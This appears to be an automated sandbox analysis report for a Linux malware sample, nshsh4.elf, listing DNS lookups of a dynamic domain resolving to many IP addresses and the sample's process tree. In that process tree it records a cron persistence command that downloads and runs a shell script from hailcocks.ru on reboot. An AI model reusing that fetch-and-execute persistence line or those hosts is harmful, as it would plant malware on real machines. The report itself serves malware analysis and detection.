                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.529244900 CEST152.53.15.127192.168.2.230x51bNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.178767920 CEST152.53.15.127192.168.2.230x1adbNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.113255978 CEST185.181.61.24192.168.2.230xf866No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.041903973 CEST202.61.197.122192.168.2.230x6acNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.759337902 CEST80.152.203.134192.168.2.230x92a9No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false

                                          System Behavior

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/tmp/nshsh4.elf
                                          Arguments:/tmp/nshsh4.elf
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/tmp/nshsh4.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/usr/bin/crontab
                                          Arguments:crontab -l
                                          File size:43720 bytes
                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/usr/bin/crontab
                                          Arguments:crontab -
                                          File size:43720 bytes
                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/tmp/nshsh4.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/tmp/nshsh4.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):17:11:59
                                          Start date (UTC):26/10/2024
                                          Path:/tmp/nshsh4.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9